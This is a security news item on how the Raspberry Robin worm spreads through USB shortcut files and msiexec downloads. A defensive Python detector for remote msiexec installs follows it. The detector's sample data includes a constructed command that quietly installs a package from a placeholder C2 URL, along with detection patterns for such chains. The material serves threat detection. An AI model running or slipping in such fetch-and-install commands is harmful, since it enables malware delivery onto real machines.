Threat Management, Malware

Repurposable nature of Raspberry Robin detailed

Numerous threat actors could repurpose Raspberry Robin, also known as the QNAP worm, for their own attacks, reports The Hacker News. SEKOIA researchers found that Raspberry Robin, which Microsoft tracks as DEV-0856, uses at least eight Linode-hosted virtual private servers as a second command-and-control layer sitting above the compromised QNAP network-attached storage devices that make up its first tier. That infrastructure supports an attack chain that begins when a victim opens a Windows shortcut (LNK) file on an inserted USB drive; the shortcut invokes the msiexec utility, which then downloads and runs the heavily obfuscated primary Raspberry Robin payload. Because msiexec retrieves the payload over HTTP, the researchers noted, those requests could be hijacked to deliver other rogue MSI packages. "By pointing this domain to our sinkhole, we were able to obtain telemetry from one of the first domains used by Raspberry Robin operators," said SEKOIA, which added that the Raspberry Robin domain could still be reused for other malicious activities.
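The chain described above (USB shortcut, then msiexec pulling an MSI over HTTP) is the part a defender can hunt for in endpoint telemetry. The following is an added example, not code from SEKOIA, Microsoft or the article: a small detector that scans Sysmon Event ID 1 style process-creation records and flags msiexec being told to install a package from a remote URL, raising the severity when the install is quiet, when the parent is a scripting or shell process, or when that parent ran a .lnk from a non-system drive. The events, hostnames and domains are constructed for the example and are not real Raspberry Robin indicators; the drive-letter heuristic for removable media is an assumption, not a rule from the research.

```python
import re
from typing import Dict, List, Optional

# Constructed Sysmon Event ID 1 (process creation) style records for illustration only.
# Hostnames, users and domains are made up; they are not real Raspberry Robin indicators.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # msiexec quietly installing from a URL, launched by cmd.exe that ran a shortcut on E:
        "Image": r"C:\Windows\System32\msiexec.exe",
        "CommandLine": r'msiexec /q /i "http://c2.example.invalid:8080/x/DESKTOP-01=alice"',
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "ParentCommandLine": r'cmd /R "E:\Recovery.lnk"',  # hypothetical USB-resident LNK
    },
    {   # benign: local MSI double-clicked from Explorer
        "Image": r"C:\Windows\System32\msiexec.exe",
        "CommandLine": r'msiexec /i "C:\Users\bob\Downloads\7zip.msi"',
        "ParentImage": r"C:\Windows\explorer.exe",
        "ParentCommandLine": r"C:\Windows\Explorer.EXE",
    },
    {   # benign: a URL on a command line, but not msiexec
        "Image": r"C:\Windows\System32\notepad.exe",
        "CommandLine": r"notepad.exe http://intranet.example.invalid/readme.txt",
        "ParentImage": r"C:\Windows\explorer.exe",
        "ParentCommandLine": r"C:\Windows\Explorer.EXE",
    },
    {   # suspicious but plausible: a vendor updater doing a quiet remote install
        "Image": r"C:\Windows\SysWOW64\msiexec.exe",
        "CommandLine": r"msiexec.exe /quiet /package https://cdn.example.invalid/agent.msi",
        "ParentImage": r"C:\Program Files\Vendor\updater.exe",
        "ParentCommandLine": r'"C:\Program Files\Vendor\updater.exe" --update',
    },
]

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# msiexec install switches (/i, /package, /a) and quiet/no-UI switches (/q, /qn, /qb, /quiet)
INSTALL_RE = re.compile(r"(?<![\w])[/-](i|package|a)\b", re.IGNORECASE)
QUIET_RE = re.compile(r"(?<![\w])[/-](q|qn|qb|quiet)\b", re.IGNORECASE)
# Heuristic (assumption): a .lnk on a drive other than C: may be removable media.
REMOVABLE_LNK_RE = re.compile(r"\b[d-z]:\\[^\s\"']*\.lnk\b", re.IGNORECASE)
# Parents that should rarely drive an msiexec install straight from a URL.
SUSPICIOUS_PARENTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "explorer.exe"}


def basename(path: str) -> str:
    """Lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def score_event(ev: Dict[str, str]) -> Optional[Dict[str, object]]:
    """Return a finding if msiexec is asked to install an MSI from a remote URL, else None."""
    if basename(ev.get("Image", "")) != "msiexec.exe":
        return None
    cmd = ev.get("CommandLine", "")
    url = URL_RE.search(cmd)
    if not url or not INSTALL_RE.search(cmd):
        return None

    reasons = ["msiexec install from remote URL"]
    severity = "medium"
    if QUIET_RE.search(cmd):
        reasons.append("quiet/no-UI install switch")
        severity = "high"
    parent = basename(ev.get("ParentImage", ""))
    if parent in SUSPICIOUS_PARENTS:
        reasons.append(f"launched by {parent}")
        severity = "high"
    if REMOVABLE_LNK_RE.search(ev.get("ParentCommandLine", "")):
        reasons.append("parent ran a .lnk from a non-system drive (possible removable media)")
        severity = "critical"
    return {"url": url.group(0), "parent": parent, "severity": severity, "reasons": reasons}


def find_remote_msiexec(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    """Run score_event over a batch of process-creation records and keep the hits."""
    return [f for f in (score_event(ev) for ev in events) if f is not None]


if __name__ == "__main__":
    for finding in find_remote_msiexec(SAMPLE_EVENTS):
        print(finding["severity"].upper(), finding["url"], "|", "; ".join(finding["reasons"]))
```

The benign local install and the notepad event produce nothing; the vendor updater surfaces as "high" so an analyst can allow-list it by parent image, and the USB-shortcut chain surfaces as "critical". In a real deployment the URL match is also where you would compare the host against sinkholed or known-bad Raspberry Robin domains, and you would feed the same records from your SIEM rather than from the constructed list above.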
